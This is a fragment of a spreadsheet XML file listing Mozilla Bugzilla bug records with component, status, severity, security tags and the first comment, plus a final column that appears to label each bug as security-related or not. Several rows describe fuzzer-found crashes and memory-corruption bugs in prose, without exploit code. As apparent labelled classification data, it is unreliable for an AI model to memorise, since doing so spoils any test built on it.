      </c>
      <c r="G592" t="n">
        <v>7</v>
      </c>
      <c r="H592" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I592" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J592" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K592" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L592" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M592" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N592" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O592" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P592" t="inlineStr"/>
      <c r="Q592" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R592" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S592" t="inlineStr">
        <is>
          <t>mozilla75</t>
        </is>
      </c>
      <c r="T592" t="n">
        <v>1</v>
      </c>
      <c r="U592" t="n">
        <v>0</v>
      </c>
      <c r="V592" t="n">
        <v>6</v>
      </c>
      <c r="W592" t="inlineStr">
        <is>
          <t>Linting [will be on by default](https://github.com/eslint/eslint/pull/12888) for `.eslintrc.js` files in ESLint 7.0.0.
There's been discussions on this before (xref bug 1563927), and I think it is a reasonable thing to have, as having editor linting helps developers changing these files, and also means we use the same format as our normal code.</t>
        </is>
      </c>
      <c r="X592" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="593">
      <c r="A593" t="n">
        <v>699033</v>
      </c>
      <c r="B593" t="inlineStr">
        <is>
          <t>2011-11-02 07:04:06 -0700</t>
        </is>
      </c>
      <c r="C593" t="inlineStr">
        <is>
          <t>[ANGLE] Assertion `typeName' failed // Parser Crash [@ TType::TType]</t>
        </is>
      </c>
      <c r="D593" t="inlineStr">
        <is>
          <t>2012-04-10 21:25:09 -0700</t>
        </is>
      </c>
      <c r="E593" t="n">
        <v>1</v>
      </c>
      <c r="F593" t="n">
        <v>1</v>
      </c>
      <c r="G593" t="n">
        <v>3</v>
      </c>
      <c r="H593" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I593" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J593" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K593" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L593" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M593" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N593" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O593" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P593" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q593" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R593" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S593" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T593" t="n">
        <v>1</v>
      </c>
      <c r="U593" t="n">
        <v>0</v>
      </c>
      <c r="V593" t="n">
        <v>28</v>
      </c>
      <c r="W593" t="inlineStr">
        <is>
          <t>Created attachment 571323
Test case for browser
This bug was filed from the Socorro interface and is 
report bp-611f2a52-3fc5-4d96-8f62-67a322111102 .
============================================================= 
The attached WebGL testcase asserts in Firefox Nightly Debug (tested with mesa llvmpipe software rendering):
firefox: /builds/slave/m-cen-lnx64-dbg/build/gfx/angle/src/compiler/Types.h:209: const TString&amp; TType::getTypeName() const: Assertion `typeName' failed.
Running in a release build, the test crashes at TType::TType (see crash report).
The test might require MOZ_GL_DEBUG=1.
This is another parser crash but not a null-deref according to the crash report. Marking this s-s until triaged and rated. Let me know if I shall report this to ANGLE or if you do so.</t>
        </is>
      </c>
      <c r="X593" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="594">
      <c r="A594" t="n">
        <v>125427</v>
      </c>
      <c r="B594" t="inlineStr">
        <is>
          <t>2002-02-13 21:02:41 -0800</t>
        </is>
      </c>
      <c r="C594" t="inlineStr">
        <is>
          <t>Taint error in duplicates.cgi with perl &lt; 5.6 ("Insecure dependency in glob")</t>
        </is>
      </c>
      <c r="D594" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:28 -0800</t>
        </is>
      </c>
      <c r="E594" t="n">
        <v>1</v>
      </c>
      <c r="F594" t="n">
        <v>1</v>
      </c>
      <c r="G594" t="n">
        <v>4</v>
      </c>
      <c r="H594" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I594" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J594" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K594" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L594" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M594" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N594" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O594" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P594" t="inlineStr"/>
      <c r="Q594" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R594" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S594" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T594" t="n">
        <v>1</v>
      </c>
      <c r="U594" t="n">
        <v>0</v>
      </c>
      <c r="V594" t="n">
        <v>12</v>
      </c>
      <c r="W594" t="inlineStr">
        <is>
          <t>When running duplicates.cgi with perl 5.005_02 I get the following software
error:
Insecure dependency in glob while running with -T switch at
/home/bugzilla/apache/htdocs/duplicates.cgi line 82. 
The line where the error occurs is:
	if (&lt;data/duplicates/dupes$today*&gt;)
This error does not occur with perl 5.6.0.
&lt;Quotes from bbaetz on IRC&gt;
bbaetz@landfill:~$ perl -wT 
if (&lt;foo*&gt;) { print "FOO\n"; }
bbaetz@landfill:~$ perl5.00503 -wT
if (&lt;foo*&gt;) { print "FOO\n"; }
Insecure dependency in glob while running with -T switch at - line 1.
bbaetz@landfill:~$ 
since dbmopen will create the file if it doesn't exist, we need to check for
existance but we can't...
perldelta says that they no longer spawn csh for globbing
thats probably it
I think that it needs to use tie rather than dbmopen
and then set the mode to not create
&lt;/Quotes&gt;</t>
        </is>
      </c>
      <c r="X594" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="595">
      <c r="A595" t="n">
        <v>1243526</v>
      </c>
      <c r="B595" t="inlineStr">
        <is>
          <t>2016-01-27 13:24:50 -0800</t>
        </is>
      </c>
      <c r="C595" t="inlineStr">
        <is>
          <t>graphite2: heap-buffer-overflow read in [@graphite2::TtfUtil::CmapSubtable12NextCodepoint]</t>
        </is>
      </c>
      <c r="D595" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:06 -0700</t>
        </is>
      </c>
      <c r="E595" t="n">
        <v>1</v>
      </c>
      <c r="F595" t="n">
        <v>1</v>
      </c>
      <c r="G595" t="n">
        <v>3</v>
      </c>
      <c r="H595" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I595" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J595" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K595" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L595" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M595" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N595" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O595" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P595" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q595" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R595" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S595" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T595" t="n">
        <v>1</v>
      </c>
      <c r="U595" t="n">
        <v>0</v>
      </c>
      <c r="V595" t="n">
        <v>7</v>
      </c>
      <c r="W595" t="inlineStr">
        <is>
          <t>Created attachment 8712848
test_case.ttf
This was found while fuzzing graphite2 1.3.5 (and is in 1.3.4)</t>
        </is>
      </c>
      <c r="X595" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="596">
      <c r="A596" t="n">
        <v>635150</v>
      </c>
      <c r="B596" t="inlineStr">
        <is>
          <t>2011-02-17 21:44:38 -0800</t>
        </is>
      </c>
      <c r="C596" t="inlineStr">
        <is>
          <t>Some release builders are shown in Regular Clobbers table</t>
        </is>
      </c>
      <c r="D596" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E596" t="n">
        <v>1</v>
      </c>
      <c r="F596" t="n">
        <v>1</v>
      </c>
      <c r="G596" t="n">
        <v>5</v>
      </c>
      <c r="H596" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I596" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J596" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K596" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L596" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M596" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N596" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O596" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P596" t="inlineStr">
        <is>
          <t>[releases]</t>
        </is>
      </c>
      <c r="Q596" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R596" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S596" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T596" t="n">
        <v>1</v>
      </c>
      <c r="U596" t="n">
        <v>0</v>
      </c>
      <c r="V596" t="n">
        <v>10</v>
      </c>
      <c r="W596" t="inlineStr">
        <is>
          <t>At the moment they are pre_push_checks and push_to_mirrors. Adding 'slavebuilddir': reallyShort(builderPrefix('...')) should fix the problem.</t>
        </is>
      </c>
      <c r="X596" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="597">
      <c r="A597" t="n">
        <v>979759</v>
      </c>
      <c r="B597" t="inlineStr">
        <is>
          <t>2014-03-04 23:29:29 -0800</t>
        </is>
      </c>
      <c r="C597" t="inlineStr">
        <is>
          <t>Run migration and npm rebuild on dev apk factory service</t>
        </is>
      </c>
      <c r="D597" t="inlineStr">
        <is>
          <t>2014-09-24 14:06:49 -0700</t>
        </is>
      </c>
      <c r="E597" t="n">
        <v>1</v>
      </c>
      <c r="F597" t="n">
        <v>1</v>
      </c>
      <c r="G597" t="n">
        <v>2</v>
      </c>
      <c r="H597" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I597" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J597" t="inlineStr">
        <is>
          <t>Operations: Marketplace</t>
        </is>
      </c>
      <c r="K597" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L597" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M597" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N597" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O597" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P597" t="inlineStr"/>
      <c r="Q597" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R597" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S597" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T597" t="n">
        <v>1</v>
      </c>
      <c r="U597" t="n">
        <v>0</v>
      </c>
      <c r="V597" t="n">
        <v>3</v>
      </c>
      <c r="W597" t="inlineStr">
        <is>
          <t>For our dev apk environment
(https://apk-controller.dev.mozaws.net/application.apk and generator)
We have a few steps that auto-update probably won't address:
1) New Schema migration!
    mysql -usomeuser -psomepassword apk_factory &lt; docs/db/schema_up_001.sql
2) npm weirdness
    rm -Rf ~/.npm
    # run this at the top of the project directory
    npm rebuild
Server will need make, g++, etc
3) New Config Options...
https://github.com/mozilla/apk-factory-service/blob/master/docs/CONFIG.md
Number of seconds manifests can be cached for
    manifestCacheTTL=60
Log Level - debug, info, warn, or error
    logLevel = 'info'
StatsD
    statsd = {
      host: 'localhost',
      port: 8125
    }
Sentry logging endpoint. App update states are written to Sentry.
    sentryDSN = 'udp://shomesha:othersha@somewhere.com:someport/somenumber'</t>
        </is>
      </c>
      <c r="X597" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="598">
      <c r="A598" t="n">
        <v>559344</v>
      </c>
      <c r="B598" t="inlineStr">
        <is>
          <t>2010-04-14 08:50:45 -0700</t>
        </is>
      </c>
      <c r="C598" t="inlineStr">
        <is>
          <t>vorbis_staticbook_unpack doesn't handle failure from oggpack_read</t>
        </is>
      </c>
      <c r="D598" t="inlineStr">
        <is>
          <t>2018-07-06 11:49:39 -0700</t>
        </is>
      </c>
      <c r="E598" t="n">
        <v>1</v>
      </c>
      <c r="F598" t="n">
        <v>1</v>
      </c>
      <c r="G598" t="n">
        <v>3</v>
      </c>
      <c r="H598" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I598" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J598" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K598" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L598" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M598" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N598" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O598" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P598" t="inlineStr">
        <is>
          <t xml:space="preserve">[sg:critical?][critsmash:patch] [qa-examined-192] [qa-needs-STR] </t>
        </is>
      </c>
      <c r="Q598" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R598" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S598" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T598" t="n">
        <v>1</v>
      </c>
      <c r="U598" t="n">
        <v>0</v>
      </c>
      <c r="V598" t="n">
        <v>43</v>
      </c>
      <c r="W598" t="inlineStr">
        <is>
          <t>149 int vorbis_staticbook_unpack(oggpack_buffer *opb,static_codebook *s){
158   s-&gt;dim=oggpack_read(opb,16);
159   s-&gt;entries=oggpack_read(opb,24);
160   if(s-&gt;entries==-1)goto _eofout;</t>
        </is>
      </c>
      <c r="X598" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="599">
      <c r="A599" t="n">
        <v>761448</v>
      </c>
      <c r="B599" t="inlineStr">
        <is>
          <t>2012-06-04 16:53:47 -0700</t>
        </is>
      </c>
      <c r="C599" t="inlineStr">
        <is>
          <t>[FIX] "ASSERTION: We should never be reusing a shared inner window" with pagehide event</t>
        </is>
      </c>
      <c r="D599" t="inlineStr">
        <is>
          <t>2013-11-25 13:20:00 -0800</t>
        </is>
      </c>
      <c r="E599" t="n">
        <v>1</v>
      </c>
      <c r="F599" t="n">
        <v>1</v>
      </c>
      <c r="G599" t="n">
        <v>3</v>
      </c>
      <c r="H599" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I599" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J599" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K599" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L599" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M599" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N599" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O599" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P599" t="inlineStr">
        <is>
          <t>[adv-main19+][adv-esr1703+]</t>
        </is>
      </c>
      <c r="Q599" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R599" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S599" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T599" t="n">
        <v>1</v>
      </c>
      <c r="U599" t="n">
        <v>0</v>
      </c>
      <c r="V599" t="n">
        <v>27</v>
      </c>
      <c r="W599" t="inlineStr">
        <is>
          <t>Created attachment 629997
testcase
###!!! ASSERTION: We should never be reusing a shared inner window: '!currentInner-&gt;IsFrozen()', file dom/base/nsGlobalWindow.cpp, line 1776</t>
        </is>
      </c>
      <c r="X599" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="600">
      <c r="A600" t="n">
        <v>1075799</v>
      </c>
      <c r="B600" t="inlineStr">
        <is>
          <t>2014-10-01 11:58:02 -0700</t>
        </is>
      </c>
      <c r="C600" t="inlineStr">
        <is>
          <t>Treeherder production job ingestion is getting backlogged</t>
        </is>
      </c>
      <c r="D600" t="inlineStr">
        <is>
          <t>2014-11-11 12:30:55 -0800</t>
        </is>
      </c>
      <c r="E600" t="n">
        <v>1</v>
      </c>
      <c r="F600" t="n">
        <v>1</v>
      </c>
      <c r="G600" t="n">
        <v>7</v>
      </c>
      <c r="H600" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I600" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J600" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K600" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L600" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M600" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N600" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O600" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P600" t="inlineStr"/>
      <c r="Q600" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R600" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S600" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T600" t="n">
        <v>1</v>
      </c>
      <c r="U600" t="n">
        <v>0</v>
      </c>
      <c r="V600" t="n">
        <v>7</v>
      </c>
      <c r="W600" t="inlineStr">
        <is>
          <t>I pushed a try job recently (about 1 1/2 hours ago), and just loaded up both Treeherder and TBPL to see how it's going.
According to Treeherder, there are 4 completed jobs (out of a total of 65) at this time. However, TBPL's view of the same try push shows me over 30 completed jobs; many of these claim to be still running but "overdue" in Treeherder. TBPL also shows me lots of running (gray) jobs that have not appeared at all in Treeherder.
At this point, then, it looks like TBPL is much better at giving me an up-to-date view of how my jobs are progressing.</t>
        </is>
      </c>
      <c r="X600" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="601">
      <c r="A601" t="n">
        <v>1089207</v>
      </c>
      <c r="B601" t="inlineStr">
        <is>
          <t>2014-10-25 12:40:51 -0700</t>
        </is>
      </c>
      <c r="C601" t="inlineStr">
        <is>
          <t>sipcc SDP parser can corrupt memory</t>
        </is>
      </c>
      <c r="D601" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:24 -0700</t>
        </is>
      </c>
      <c r="E601" t="n">
        <v>1</v>
      </c>
      <c r="F601" t="n">
        <v>1</v>
      </c>
      <c r="G601" t="n">
        <v>3</v>
      </c>
      <c r="H601" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I601" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J601" t="inlineStr">
        <is>
          <t>WebRTC: Signaling</t>
        </is>
      </c>
      <c r="K601" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L601" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M601" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N601" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O601" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P601" t="inlineStr">
        <is>
          <t>[adv-main34+][adv-esr31.3+]</t>
        </is>
      </c>
      <c r="Q601" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R601" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S601" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T601" t="n">
        <v>1</v>
      </c>
      <c r="U601" t="n">
        <v>0</v>
      </c>
      <c r="V601" t="n">
        <v>39</v>
      </c>
      <c r="W601" t="inlineStr">
        <is>
          <t>Created attachment 8511551
sdp_attr_security_hole.patch
While fuzzing SDParta I found this little gem in our SDP parsing code:
http://dxr.mozilla.org/mozilla-central/source/media/webrtc/signaling/src/sipcc/core/sdp/sdp_attr.c#508
I think if you hand Firefox some SDP with a missing newline the above loop will walk through all your memory and replace '/' with ';' where ever it finds '/'s in you memory until it finally comes across a newline some where in you memory.</t>
        </is>
      </c>
      <c r="X601" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="602">
      <c r="A602" t="n">
        <v>1536522</v>
      </c>
      <c r="B602" t="inlineStr">
        <is>
          <t>2019-03-19 10:33:10 -0700</t>
        </is>
      </c>
      <c r="C602" t="inlineStr">
        <is>
          <t>Fennec x86-64 beta doesn't have the right package name</t>
        </is>
      </c>
      <c r="D602" t="inlineStr">
        <is>
          <t>2019-04-09 10:03:14 -0700</t>
        </is>
      </c>
      <c r="E602" t="n">
        <v>1</v>
      </c>
      <c r="F602" t="n">
        <v>1</v>
      </c>
      <c r="G602" t="n">
        <v>5</v>
      </c>
      <c r="H602" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I602" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J602" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K602" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L602" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M602" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N602" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O602" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P602" t="inlineStr"/>
      <c r="Q602" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R602" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S602" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T602" t="n">
        <v>1</v>
      </c>
      <c r="U602" t="n">
        <v>0</v>
      </c>
      <c r="V602" t="n">
        <v>12</v>
      </c>
      <c r="W602" t="inlineStr">
        <is>
          <t>```
    package_names_check.validate(apks_metadata_per_paths)
  File "/builds/scriptworker/lib/python3.6/site-packages/mozapkpublisher/common/apk/checker.py", line 26, in validate
    raise BadSetOfApks('Expected product types {}, found {}'.format(self.expected_product_types, types))
mozapkpublisher.common.exceptions.BadSetOfApks: Expected product types ['org.mozilla.firefox_beta'], found {'org.mozilla.firefox_beta', 'org.mozilla.fennec_aurora'}
exit code: 1
```
From [here](https://taskcluster-artifacts.net/YtEp5WCWR7uVbI35OXaLbQ/0/public/logs/live_backing.log) via [this task](https://tools.taskcluster.net/groups/du0QSNLoRraYMVVfd08SkQ/tasks/YtEp5WCWR7uVbI35OXaLbQ/details)</t>
        </is>
      </c>
      <c r="X602" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="603">
      <c r="A603" t="n">
        <v>1818781</v>
      </c>
      <c r="B603" t="inlineStr">
        <is>
          <t>2023-02-24 09:08:07 -0800</t>
        </is>
      </c>
      <c r="C603" t="inlineStr">
        <is>
          <t>Assertion failure: !hasDelayedMarking(), at js/src/gc/GC.cpp:1370</t>
        </is>
      </c>
      <c r="D603" t="inlineStr">
        <is>
          <t>2024-06-02 11:57:13 -0700</t>
        </is>
      </c>
      <c r="E603" t="n">
        <v>1</v>
      </c>
      <c r="F603" t="n">
        <v>1</v>
      </c>
      <c r="G603" t="n">
        <v>3</v>
      </c>
      <c r="H603" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I603" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J603" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K603" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L603" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M603" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N603" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O603" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P603" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main112+]</t>
        </is>
      </c>
      <c r="Q603" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R603" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S603" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T603" t="n">
        <v>1</v>
      </c>
      <c r="U603" t="n">
        <v>0</v>
      </c>
      <c r="V603" t="n">
        <v>19</v>
      </c>
      <c r="W603" t="inlineStr">
        <is>
          <t>Created attachment 9319729
js.patch
Steps to reproduce:
On git commit 2346ab0fa1665d535677c48353a3b6beb6981d3e a fuzzer found an assertion violation in the js-shell. The crash is flaky and difficult to reproduce but I attached the necessary files that trigger the issue (on my machine).
First of all, there is `js.patch` which slightly modifies the js-shell such that reprl mode becomes compatible with rr recording.
Then, there is `reprl2.py` which feeds 4 .js files via the reprl interface to the shell. The script exits if the particular execution didn't trigger the assertion violation and should freeze once the shell crashes.
Then, there are the 4 .js files executed via the reprl interface. 
Letting the script run with `while true; do python3 reprl2.py; done;` should provoke the crash at some point, roughly takes 50-100 runs on my machine. Occasionally, rr encounters an internal error and the loop must be restarted.
```
#0  js::gc::GCRuntime::assertNoMarkingWork (this=0x3f418b23728)
    at js/src/gc/GC.cpp:1370
#1  0x000055c367db9249 in js::gc::GCRuntime::endSweepingSweepGroup (this=0x3f418b23728, 
    gcx=0x3f418b23740, budget=...) at js/src/gc/Sweeping.cpp:1630
#2  0x000055c367dd6e31 in sweepaction::SweepActionSequence::run (this=0x3f418b06790, args=...)
    at js/src/gc/Sweeping.cpp:2128
#3  0x000055c367dd3260 in sweepaction::SweepActionForEach&lt;js::gc::SweepGroupsIter, JSRuntime*&gt;::run (
    this=0x3f418b1a610, args=...) at js/src/gc/Sweeping.cpp:2163
#4  0x000055c367dbdac2 in js::gc::GCRuntime::performSweepActions (this=0x3f418b23728, budget=...)
    at js/src/gc/Sweeping.cpp:2305
#5  0x000055c367d1e5b9 in js::gc::GCRuntime::incrementalSlice (this=0x3f418b23728, budget=..., 
    reason=JS::GCReason::DEBUG_GC, budgetWasIncreased=&lt;optimized out&gt;)
    at js/src/gc/GC.cpp:3687
#6  0x000055c367d23579 in js::gc::GCRuntime::gcCycle (this=0x3f418b23728, nonincrementalByAPI=false, 
    budgetArg=..., reason=JS::GCReason::DEBUG_GC)
    at js/src/gc/GC.cpp:4198
#7  0x000055c367d243d3 in js::gc::GCRuntime::collect (this=0x3f418b23728, 
    nonincrementalByAPI=&lt;optimized out&gt;, budget=..., reason=JS::GCReason::DEBUG_GC)
    at js/src/gc/GC.cpp:4386
#8  0x000055c36794a006 in GCSlice (cx=&lt;optimized out&gt;, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;)
    at js/src/builtin/TestingFunctions.cpp:2638
```</t>
        </is>
      </c>
      <c r="X603" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="604">
      <c r="A604" t="n">
        <v>414922</v>
      </c>
      <c r="B604" t="inlineStr">
        <is>
          <t>2008-01-30 12:06:32 -0800</t>
        </is>
      </c>
      <c r="C604" t="inlineStr">
        <is>
          <t>RSS Subscription broken</t>
        </is>
      </c>
      <c r="D604" t="inlineStr">
        <is>
          <t>2018-12-20 14:42:01 -0800</t>
        </is>
      </c>
      <c r="E604" t="n">
        <v>1</v>
      </c>
      <c r="F604" t="n">
        <v>1</v>
      </c>
